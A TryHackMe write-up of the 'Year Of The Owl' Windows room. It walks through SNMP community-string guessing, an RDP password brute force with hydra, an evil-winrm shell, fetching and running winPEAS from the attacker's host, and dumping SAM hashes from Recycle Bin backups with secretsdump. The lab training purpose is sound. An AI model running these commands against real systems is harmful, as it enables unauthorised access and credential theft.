TryHackMe: Year Of The Owl https://tryhackme.com/room/yearoftheowl by MuirlandOracle
Enumeration
Lets fire off rustscan
$ rustscan -a owl -- -sC -sV -A -oA yearoftheowl -v
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/home/tj/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.128.205:80
Open 10.10.128.205:139
Open 10.10.128.205:443
Open 10.10.128.205:445
Open 10.10.128.205:3306
Open 10.10.128.205:3389
Open 10.10.128.205:5985
Open 10.10.128.205:47001
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-30 23:20 GMT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:20
Completed NSE at 23:20, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:20
Completed NSE at 23:20, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:20
Completed NSE at 23:20, 0.00s elapsed
Initiating Ping Scan at 23:20
Scanning 10.10.128.205 [2 ports]
Completed Ping Scan at 23:20, 0.04s elapsed (1 total hosts)
Initiating Connect Scan at 23:20
Scanning yearoftheowl (10.10.128.205) [8 ports]
Discovered open port 139/tcp on 10.10.128.205
Discovered open port 443/tcp on 10.10.128.205
Discovered open port 80/tcp on 10.10.128.205
Discovered open port 3389/tcp on 10.10.128.205
Discovered open port 445/tcp on 10.10.128.205
Discovered open port 3306/tcp on 10.10.128.205
Discovered open port 5985/tcp on 10.10.128.205
Discovered open port 47001/tcp on 10.10.128.205
Completed Connect Scan at 23:20, 0.03s elapsed (8 total ports)
Initiating Service scan at 23:20
Scanning 8 services on yearoftheowl (10.10.128.205)
Completed Service scan at 23:20, 12.19s elapsed (8 services on 1 host)
NSE: Script scanning 10.10.128.205.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:20
NSE Timing: About 99.91% done; ETC: 23:21 (0:00:00 remaining)
Completed NSE at 23:21, 40.30s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:21
Completed NSE at 23:21, 0.43s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:21
Completed NSE at 23:21, 0.00s elapsed
Nmap scan report for yearoftheowl (10.10.128.205)
Host is up, received syn-ack (0.035s latency).
Scanned at 2020-11-30 23:20:18 GMT for 53s
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.10
|_http-title: Year of the Owl
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.10
|_http-title: Year of the Owl
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4 4cc9 9e84 b26f 9e63 9f9e d229 dee0
| SHA-1: b023 8c54 7a90 5bfa 119c 4e8b acca eacf 3649 1ff6
| -----BEGIN CERTIFICATE-----
| MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls
| b2NhbGhvc3QwHhcNMDkxMTEwMjM0ODQ3WhcNMTkxMTA4MjM0ODQ3WjAUMRIwEAYD
| VQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMEl0yfj
| 7K0Ng2pt51+adRAj4pCdoGOVjx1BmljVnGOMW3OGkHnMw9ajibh1vB6UfHxu463o
| J1wLxgxq+Q8y/rPEehAjBCspKNSq+bMvZhD4p8HNYMRrKFfjZzv3ns1IItw46kgT
| gDpAl1cMRzVGPXFimu5TnWMOZ3ooyaQ0/xntAgMBAAEwDQYJKoZIhvcNAQEFBQAD
| gYEAavHzSWz5umhfb/MnBMa5DL2VNzS+9whmmpsDGEG+uR0kM1W2GQIdVHHJTyFd
| aHXzgVJBQcWTwhp84nvHSiQTDBSaT6cQNQpvag/TaED/SEQpm0VqDFwpfFYuufBL
| vVNbLkKxbK2XwUvu0RxoLdBMC/89HqrZ0ppiONuQ+X2MtxE=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds? syn-ack
3306/tcp open mysql? syn-ack
| fingerprint-strings:
| FourOhFourRequest, GenericLines, NULL:
|_ Host 'ip-10-9-5-198.eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
| mysql-info:
|_ MySQL Error: Host 'ip-10-9-5-198.eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: YEAR-OF-THE-OWL
| NetBIOS_Domain_Name: YEAR-OF-THE-OWL
| NetBIOS_Computer_Name: YEAR-OF-THE-OWL
| DNS_Domain_Name: year-of-the-owl
| DNS_Computer_Name: year-of-the-owl
| Product_Version: 10.0.17763
|_ System_Time: 2020-11-30T23:20:31+00:00
| ssl-cert: Subject: commonName=year-of-the-owl
| Issuer: commonName=year-of-the-owl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-16T19:04:21
| Not valid after: 2021-03-18T19:04:21
| MD5: a4ad f32c 5473 eee3 2d2c ca88 c231 7879
| SHA-1: 1824 b248 b428 857e 8ce6 f1f3 d60d 333a d679 5c5b
| -----BEGIN CERTIFICATE-----
| MIIC4jCCAcqgAwIBAgIQFnYpvP/X27lLNvLGGW6FnDANBgkqhkiG9w0BAQsFADAa
| MRgwFgYDVQQDEw95ZWFyLW9mLXRoZS1vd2wwHhcNMjAwOTE2MTkwNDIxWhcNMjEw
| MzE4MTkwNDIxWjAaMRgwFgYDVQQDEw95ZWFyLW9mLXRoZS1vd2wwggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQC3636hkJl+hlDY3UMk/U1JJ3wW8JvIyrAI
| KWgFuf5+VzSW9Jtsjmvvoon3wPMbRc2K7RbEn/WfnQGP1m2UaA8lDrpFkDAE7+FZ
| tJFgjGkIys8YzcxdRGD5stzeSotytSVt/zgVyci67yJCBcihoyp5+w05OBFaYQWa
| U2VT1QpdijRqqTPcTx6CVgHJzgwRVUXvrPaOcfM2DZOF2knhEmuBBpMwEJCh/sqB
| pezD5/PDJ+5bC6CVj5gJCJXULr8nGR7DZnfyR+uwGnDoRXl/7jWSdGhprwbo1v/M
| iU8BuKT1vZuF7dXRACTlLHlsqqtEh0d3wMLnmWvTGNYQc8wS6VuVAgMBAAGjJDAi
| MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF
| AAOCAQEAISrU6a8Nhh2IWZkgdeczge0rxk8e2pSxp0vwWfF2sVhvrMV3m/d2Sm7i
| oUwc3tToj7Sgns/KMrTzEq7KPgIRlTDung/TQtv/Rs0T+SdQZAVp+tWZVSOu3jkA
| XFowMSV+TgoHSvfKv8xsGJvqjUW6sGGD69g22ruUrVQA9ipk4nT5BKJ1nTmd3XvA
| 7+WnNpZ7LfZT/7dws1IZp5TrbIj2tEUyJP8rA4UzMwcp6KM5c0Z7S0X82Z0WPRVk
| XaZWU3Ypqx+eE2Nn1Cb8yHUgQwc1bzx7r+aMiqdFATAybYXVgJjNNNq1VsMOFMnO
| qaEfWPcd+z1+jDQPhfdLPgLIjytp8g==
|_-----END CERTIFICATE-----
|_ssl-date: 2020-11-30T23:21:11+00:00; 0s from scanner time.
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=11/30%Time=5FC57E32%P=x86_64-pc-linux-gnu%r(N
SF:ULL,67,"c\0\0\x01\xffj\x04Host\x20'ip-10-9-5-198\.eu-west-1\.compute\.i
SF:nternal'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20Mari
SF:aDB\x20server")%r(GenericLines,67,"c\0\0\x01\xffj\x04Host\x20'ip-10-9-5
SF:-198\.eu-west-1\.compute\.internal'\x20is\x20not\x20allowed\x20to\x20co
SF:nnect\x20to\x20this\x20MariaDB\x20server")%r(FourOhFourRequest,67,"c\0\
SF:0\x01\xffj\x04Host\x20'ip-10-9-5-198\.eu-west-1\.compute\.internal'\x20
SF:is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20serve
SF:r");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 24626/tcp): CLEAN (Timeout)
| Check 2 (port 51517/tcp): CLEAN (Timeout)
| Check 3 (port 26276/udp): CLEAN (Timeout)
| Check 4 (port 47591/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-11-30T23:20:35
|_ start_date: N/A
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:21
Completed NSE at 23:21, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:21
Completed NSE at 23:21, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:21
Completed NSE at 23:21, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.65 seconds
80 - HTTP
Redirects to www.******** so updated /etc/hosts and get the below
Just an owl.... nothing hidden with steg....
443 - HTTPS
HTTPS appears to be the same as HTTP, nothing different from first glance...
139 - RPC / 445 - SMB
enum4linux, smbclient and thunar not bringing anything back...
3306 - MySQL
No access
3389 - MS RDP
No access
5985 - HTTPAPI
Nothing to see here ...
47001 - HTTPAPI
Nothing to see here ...
Flag1
User Flag
Tried all sorts against the various servers without any joy and then got the hint udp ...... tried scanning for open UDP ports and trying a few different things.... but after a couple of extends on the box RAGE QUIT
..... picking it back up and finding out it was snmp I run onesixtyone to find the community string
╰─⠠⠵ onesixtyone 10.10.24.181 -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt
Scanning 1 hosts, 3219 communities
10.10.24.181 [openview] Hardware: Intel64 Family 6 Model 79 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 17763 Multiprocessor Free)
Then snmp-check to enumerate the snmp
╰─⠠⠵ snmp-check 10.10.24.181 -c openview
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 10.10.24.181:161 using SNMPv1 and community 'openview'
[*] System information:
Host IP address : 10.10.24.181
Hostname : year-of-the-owl
Description : Hardware: Intel64 Family 6 Model 79 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 17763 Multiprocessor Free)
Contact : -
Location : -
Uptime snmp : 00:05:43.68
Uptime system : 00:04:46.45
System date : 2021-2-14 23:45:37.3
Domain : WORKGROUP
[*] User accounts:
Guest
[REDACTED]
Administrator
DefaultAccount
WDAGUtilityAccount
[*] Network information:
IP forwarding enabled : no
Default TTL : 128
TCP segments received : 63
TCP segments sent : 99
TCP segments retrans : 71
Input datagrams : 3361
Delivered datagrams : 3437
Output datagrams : 278
[*] Network interfaces:
Interface : [ up ] Software Loopback Interface 1
Id : 1
Mac Address : :::::
Type : softwareLoopback
Speed : 1073 Mbps
MTU : 1500
In octets : 0
Out octets : 0
Interface : [ down ] Microsoft 6to4 Adapter
Id : 2
Mac Address : :::::
Type : unknown
Speed : 0 Mbps
MTU : 0
In octets : 0
Out octets : 0
Interface : [ down ] Microsoft IP-HTTPS Platform Adapter
Id : 3
Mac Address : :::::
Type : unknown
Speed : 0 Mbps
MTU : 0
In octets : 0
Out octets : 0
Interface : [ down ] Microsoft Kernel Debug Network Adapter
Id : 4
Mac Address : :::::
Type : ethernet-csmacd
Speed : 0 Mbps
MTU : 0
In octets : 0
Out octets : 0
Interface : [ down ] Intel(R) 82574L Gigabit Network Connection
Id : 5
Mac Address : 00:0c:29:02:45:89
Type : ethernet-csmacd
Speed : 0 Mbps
MTU : 0
In octets : 0
Out octets : 0
Interface : [ down ] Microsoft Teredo Tunneling Adapter
Id : 6
Mac Address : :::::
Type : unknown
Speed : 0 Mbps
MTU : 0
In octets : 0
Out octets : 0
Interface : [ up ] AWS PV Network Device #0
Id : 7
Mac Address : 02:4f:09:70:3a:af
Type : ethernet-csmacd
Speed : 1000 Mbps
MTU : 9001
In octets : 295983
Out octets : 29788
Interface : [ up ] AWS PV Network Device #0-WFP Native MAC Layer LightWeight Filter-0000
Id : 8
Mac Address : 02:4f:09:70:3a:af
Type : ethernet-csmacd
Speed : 1000 Mbps
MTU : 9001
In octets : 295983
Out octets : 29788
Interface : [ up ] AWS PV Network Device #0-QoS Packet Scheduler-0000
Id : 9
Mac Address : 02:4f:09:70:3a:af
Type : ethernet-csmacd
Speed : 1000 Mbps
MTU : 9001
In octets : 295983
Out octets : 29788
Interface : [ up ] AWS PV Network Device #0-WFP 802.3 MAC Layer LightWeight Filter-0000
Id : 10
Mac Address : 02:4f:09:70:3a:af
Type : ethernet-csmacd
Speed : 1000 Mbps
MTU : 9001
In octets : 295983
Out octets : 29788
[*] Network IP:
Id IP Address Netmask Broadcast
7 10.10.24.181 255.255.0.0 1
1 127.0.0.1 255.0.0.0 1
[*] Routing information:
Destination Next hop Mask Metric
0.0.0.0 10.10.0.1 0.0.0.0 25
10.10.0.0 10.10.24.181 255.255.0.0 281
10.10.24.181 10.10.24.181 255.255.255.255 281
10.10.255.255 10.10.24.181 255.255.255.255 281
127.0.0.0 127.0.0.1 255.0.0.0 331
127.0.0.1 127.0.0.1 255.255.255.255 331
127.255.255.255 127.0.0.1 255.255.255.255 331
169.254.169.123 10.10.0.1 255.255.255.255 50
169.254.169.249 10.10.0.1 255.255.255.255 50
169.254.169.250 10.10.0.1 255.255.255.255 50
169.254.169.251 10.10.0.1 255.255.255.255 50
169.254.169.253 10.10.0.1 255.255.255.255 50
169.254.169.254 10.10.0.1 255.255.255.255 50
224.0.0.0 127.0.0.1 240.0.0.0 331
255.255.255.255 127.0.0.1 255.255.255.255 331
[*] TCP connections and listening ports:
Local address Local port Remote address Remote port State
0.0.0.0 80 0.0.0.0 0 listen
0.0.0.0 135 0.0.0.0 0 listen
0.0.0.0 443 0.0.0.0 0 listen
0.0.0.0 445 0.0.0.0 0 listen
0.0.0.0 3306 0.0.0.0 0 listen
0.0.0.0 3389 0.0.0.0 0 listen
0.0.0.0 5985 0.0.0.0 0 listen
0.0.0.0 47001 0.0.0.0 0 listen
0.0.0.0 49664 0.0.0.0 0 listen
0.0.0.0 49665 0.0.0.0 0 listen
0.0.0.0 49666 0.0.0.0 0 listen
0.0.0.0 49667 0.0.0.0 0 listen
0.0.0.0 49668 0.0.0.0 0 listen
0.0.0.0 49669 0.0.0.0 0 listen
10.10.24.181 139 0.0.0.0 0 listen
10.10.24.181 49717 138.91.136.108 443 synSent
10.10.24.181 49718 52.152.110.14 443 synSent
10.10.24.181 49719 23.195.139.83 443 synSent
[*] Listening UDP ports:
Local address Local port
0.0.0.0 123
0.0.0.0 161
0.0.0.0 3389
0.0.0.0 5353
0.0.0.0 5355
10.10.24.181 137
10.10.24.181 138
127.0.0.1 63761
[*] Network services:
Index Name
0 Power
1 mysql
2 Server
3 Themes
4 SysMain
5 Apache2.4
6 IP Helper
7 DNS Client
8 DHCP Client
9 Time Broker
10 Workstation
11 SNMP Service
12 User Manager
13 Windows Time
14 CoreMessaging
15 Plug and Play
16 Print Spooler
17 Task Scheduler
18 Windows Update
19 Remote Registry
20 Amazon SSM Agent
21 CNG Key Isolation
22 COM+ Event System
23 Windows Event Log
24 IPsec Policy Agent
25 Group Policy Client
26 RPC Endpoint Mapper
27 Web Account Manager
28 AWS Lite Guest Agent
29 Device Setup Manager
30 Network List Service
31 System Events Broker
32 User Profile Service
33 Base Filtering Engine
34 Local Session Manager
35 TCP/IP NetBIOS Helper
36 Cryptographic Services
37 Certificate Propagation
38 Remote Desktop Services
39 Shell Hardware Detection
40 State Repository Service
41 Diagnostic Policy Service
42 Network Connection Broker
43 Security Accounts Manager
44 Windows Defender Firewall
45 Network Location Awareness
46 Windows Connection Manager
47 Windows Font Cache Service
48 Remote Procedure Call (RPC)
49 Update Orchestrator Service
50 User Access Logging Service
51 DCOM Server Process Launcher
52 Remote Desktop Configuration
53 Network Store Interface Service
54 Client License Service (ClipSVC)
55 Distributed Link Tracking Client
56 AppX Deployment Service (AppXSVC)
57 System Event Notification Service
58 Connected Devices Platform Service
59 Windows Defender Antivirus Service
60 Windows Management Instrumentation
61 Distributed Transaction Coordinator
62 Microsoft Account Sign-in Assistant
63 Background Tasks Infrastructure Service
64 Connected User Experiences and Telemetry
65 WinHTTP Web Proxy Auto-Discovery Service
66 Windows Push Notifications System Service
67 Windows Remote Management (WS-Management)
68 Remote Desktop Services UserMode Port Redirector
69 Windows Defender Antivirus Network Inspection Service
[*] Processes:
Id Status Name Path Parameters
1 running System Idle Process
4 running System
68 running Registry
412 running smss.exe
504 running svchost.exe C:\Windows\System32\ -k LocalServiceNetworkRestricted -p
512 running dwm.exe
568 running csrss.exe
640 running svchost.exe C:\Windows\system32\ -k netsvcs -p
644 running csrss.exe
660 running wininit.exe
704 running winlogon.exe
764 running svchost.exe C:\Windows\System32\ -k LocalSystemNetworkRestricted -p
768 running services.exe
788 running lsass.exe C:\Windows\system32\
848 running svchost.exe C:\Windows\System32\ -k termsvcs
884 running svchost.exe C:\Windows\system32\ -k DcomLaunch -p
904 running fontdrvhost.exe
912 running fontdrvhost.exe
980 running svchost.exe C:\Windows\system32\ -k RPCSS -p
1124 running amazon-ssm-agent.exe C:\Program Files\Amazon\SSM\
1136 running upfc.exe
1188 running svchost.exe C:\Windows\system32\ -k LocalService -p
1276 running svchost.exe C:\Windows\System32\ -k NetworkService -p
1308 running svchost.exe C:\Windows\system32\ -k LocalServiceNetworkRestricted -p
1380 running LiteAgent.exe C:\Program Files\Amazon\XenTools\
1396 running svchost.exe C:\Windows\system32\ -k LocalServiceNoNetworkFirewall -p
1488 running svchost.exe C:\Windows\system32\ -k LocalServiceNoNetwork -p
1744 running svchost.exe C:\Windows\system32\ -k netsvcs
1868 running spoolsv.exe C:\Windows\System32\
1904 running svchost.exe C:\Windows\System32\ -k utcsvc -p
1984 running svchost.exe C:\Windows\system32\ -k LocalService
2016 running MsMpEng.exe
2040 running snmp.exe C:\Windows\System32\
2052 running httpd.exe C:\xampp\apache\bin\ -k runservice
2084 running mysqld.exe C:\xampp\mysql\bin\ --defaults-file=c:\xampp\mysql\bin\my.ini mysql
2104 running svchost.exe C:\Windows\System32\ -k smbsvcs
2324 running svchost.exe C:\Windows\system32\ -k NetworkServiceNetworkRestricted -p
2836 running LogonUI.exe /flags:0x2 /state0:0xa3a7c855 /state1:0x41c64e6d
3028 running httpd.exe C:\xampp\apache\bin\ -d C:/xampp/apache
3708 running svchost.exe
3748 running MpCmdRun.exe C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\ SignatureUpdate -ScheduleJob -RestrictPrivileges -Reinvoke
3936 running NisSrv.exe
4408 running svchost.exe C:\Windows\system32\ -k appmodel -p
4572 running msdtc.exe C:\Windows\System32\
4948 running MpCmdRun.exe C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\ SignaturesUpdateService -ScheduleJob -HttpDownload -RestrictPrivileges -Reinvoke
5052 running WmiPrvSE.exe C:\Windows\system32\wbem\
[*] Storage information:
Description : ["C:\\ Label: Serial Number 7c0c3814"]
Device id : [#<SNMP::Integer:0x000055f7ab447e30 @value=1>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x000055f7ab442818 @value=4096>]
Memory size : 19.46 GB
Memory used : 15.49 GB
Description : ["Virtual Memory"]
Device id : [#<SNMP::Integer:0x000055f7ab3e37f0 @value=2>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x000055f7ab2d1808 @value=65536>]
Memory size : 3.12 GB
Memory used : 837.56 MB
Description : ["Physical Memory"]
Device id : [#<SNMP::Integer:0x000055f7ab756220 @value=3>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x000055f7ab7543d0 @value=65536>]
Memory size : 2.00 GB
Memory used : 750.62 MB
[*] File system information:
Index : 1
Mount point :
Remote mount point : -
Access : 1
Bootable : 0
[*] Device information:
Id Type Status Descr
1 unknown running Microsoft XPS Document Writer v4
2 unknown running Microsoft Print To PDF
3 unknown running Unknown Processor Type
4 unknown unknown Software Loopback Interface 1
5 unknown unknown Microsoft 6to4 Adapter
6 unknown unknown Microsoft IP-HTTPS Platform Adapter
7 unknown unknown Microsoft Kernel Debug Network Adapter
8 unknown unknown Intel(R) 82574L Gigabit Network Connection
9 unknown unknown Microsoft Teredo Tunneling Adapter
10 unknown unknown AWS PV Network Device #0
11 unknown unknown AWS PV Network Device #0-WFP Native MAC Layer LightWeight Filter
12 unknown unknown AWS PV Network Device #0-QoS Packet Scheduler-0000
13 unknown unknown AWS PV Network Device #0-WFP 802.3 MAC Layer LightWeight Filter-
14 unknown running Fixed Disk
15 unknown running Fixed Disk
16 unknown running IBM enhanced (101- or 102-key) keyboard, Subtype=(0)
17 unknown unknown COM1:
[*] Software components:
Index Name
1 XAMPP
2 Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.11.25325
3 Microsoft Visual C++ 2017 x64 Additional Runtime - 14.11.25325
4 Amazon SSM Agent
5 Amazon SSM Agent
6 Microsoft Visual C++ 2017 Redistributable (x64) - 14.11.25325
From the above we have the following useful information
[*] System information:
Host IP address : 10.10.24.181
Hostname : year-of-the-owl
Domain : WORKGROUP
[*] User accounts:
Guest
[REDACTED]
Administrator
DefaultAccount
WDAGUtilityAccount
OK, we have a username to try to enumerate [REDACTED]... Let's run hydra and see if we can brute force it
╰─⠠⠵ hydra -l [REDACTED] -P /usr/share/wordlists/rockyou.txt owl rdp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-14 23:50:27
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344400 login tries (l:1/p:14344400), ~3586100 tries per task
[DATA] attacking rdp://owl:3389/
[3389][rdp] account on 10.10.24.181 might be valid but account not active for remote desktop: login: [REDACTED] password: [REDACTED], continuing attacking the account.
Hmmm, hydra reports a password but RDP throws an error...
Ok, if rdp does not work lets try something else ... Using evil-winrm we get a shell
╰─⠠⠵ evil-winrm -i owl -u [REDACTED]
Enter Password:
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\[REDACTED]\Documents>
Navigating to C:\users\[REDACTED]\desktop we can use gc to read the content of user.txt
*Evil-WinRM* PS C:\users\[REDACTED]\Documents> cd C:\users\[REDACTED]\desktop
*Evil-WinRM* PS C:\users\[REDACTED]\desktop> gc user.txt
[REDACTED]
Flag2
Admin Flag
Ok, now that we on the box we need to privesc, let's grab winPEAS.bat and run it
> invoke-webrequest 'http://10.9.5.198:9999/winPEAS.bat' -out peas.bat
> .\peas.bat
((,.,/((((((((((((((((((((/, */
[+] SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
peas.bat : ERROR:
+ CategoryInfo : NotSpecified: (ERROR::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Description = Access denied
[+] CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
[+] UNQUOTED SERVICE PATHS
[i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Progam.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'
[i] The permissions are also checked and filtered using icacls
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
[*] DLL HIJACKING in PATHenv variable
[i] Maybe you can take advantage of modifying/creating some binary in some of the following locations
[i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking
C:\Windows\system32 NT SERVICE\TrustedInstaller:(F)
C:\Windows NT SERVICE\TrustedInstaller:(F)
C:\Windows\System32\Wbem NT SERVICE\TrustedInstaller:(F)
C:\Users\[REDACTED]\AppData\Local\Microsoft\WindowsApps NT AUTHORITY\SYSTEM:(OI)(CI)(F)
YEAR-OF-THE-OWL\[REDACTED]:(OI)(CI)(F)
[*] CREDENTIALS
[+] WINDOWS VAULT
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#windows-vault
Currently stored credentials:
* NONE *
[+] Unattended files
[+] SAM and SYSTEM backups
[+] McAffee SiteList.xml
Volume in drive C has no label.
Volume Serial Number is 7C0C-3814
Volume in drive C has no label.
Volume Serial Number is 7C0C-3814
Volume in drive C has no label.
Volume Serial Number is 7C0C-3814
Volume in drive C has no label.
Volume Serial Number is 7C0C-3814
..
..
..
..
..
..
..
At which point it crashed ........
Ok, lets look around the file system as it could be the AV breaking winPEAS...
*Evil-WinRM* PS C:\> gci -hidden .
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 9/18/2020 2:14 AM $Recycle.Bin
d--hsl 9/17/2020 7:27 PM Documents and Settings
d--h-- 9/18/2020 2:04 AM ProgramData
d--hs- 9/17/2020 7:27 PM Recovery
d--hs- 9/17/2020 7:26 PM System Volume Information
-a-hs- 2/14/2021 11:40 PM 1207959552 pagefile.sys
We have the Recycle Bin, let's take a look in there...
*Evil-WinRM* PS C:\> gci -path 'C:\$Recycle.Bin' -h
Directory: C:\$Recycle.Bin
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 9/18/2020 7:28 PM S-1-5-21-1987495829-1628902820-919763334-1001
d--hs- 11/13/2020 10:41 PM S-1-5-21-1987495829-1628902820-919763334-500
Ok, two directories in there ..... as with Linux there are some reserved / well known SID's / RID's and normally '....-500' would indicate a local administrator account so let skip that and have a look in ...-1001 which should be a user.
*Evil-WinRM* PS C:\> cd 'C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001'
*Evil-WinRM* PS C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001> gci
Directory: C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/18/2020 7:28 PM 49152 sam.bak
-a---- 9/18/2020 7:28 PM 17457152 system.bak
Ooooo we have a sam.bak and system.bak ....... these normally allow you to grab the LM or NT hashes.... Can we download them ?
Even though the download looks like it works from the $Recyclue.Bin it does not, you need to copy them somewhere else first
> download sam.bak
Info: Downloading C:\users\[REDACTED]\sam.bak to sam.bak
Progress: 6% : |▒░░░░░░░░░░|
Info: Download successful!
> download system.bak
Info: Downloading C:\users\[REDACTED]\system.bak to system.bak
Progress: 12% : |▒░░░░░░░░░|
Info: Download successful!
Ok, so using impacket-secretsdump we can smash these file together and get the hash....
╰─⠠⠵ impacket-secretsdump -ts local -system system.bak -sam sam.bak
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[2021-02-15 00:48:43] [*] Target system bootKey: 0xd676472afd9cc13ac271e26890b87a8c
[2021-02-15 00:48:43] [*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:[REDACTED]:[REDACTED]:::
Guest:501:[REDACTED]:[REDACTED]:[REDACTED]:::
DefaultAccount:503:[REDACTED]:[REDACTED]:::
WDAGUtilityAccount:504:[REDACTED]:[REDACTED]:::
